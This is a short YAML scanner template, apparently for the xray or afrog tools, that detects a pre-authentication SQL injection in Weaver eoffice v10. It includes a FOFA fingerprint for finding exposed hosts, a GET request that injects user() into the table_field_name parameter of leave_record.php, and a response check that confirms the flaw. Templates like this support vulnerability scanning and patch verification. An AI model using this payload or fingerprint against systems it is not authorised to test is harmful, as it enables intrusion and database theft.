id: e-office-v10-sql-inject

info:
  name: 泛微 eoffice v10 前台 SQL 注入
  author: 你是猪
  severity: high
  description: |
    FOFA：fid="2csJpuWtfTdSAavIfJTuBw=="
    进一步利用/验证方法，参考下面 reference 链接
  reference:
    - https://www.hedysx.com/2777.html

rules:
  r0:
    request:
      method: GET
      path: /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10
    expression: response.status == 200 && response.body.bcontains(b'<p>未找到相关数据</p>')
expression: r0()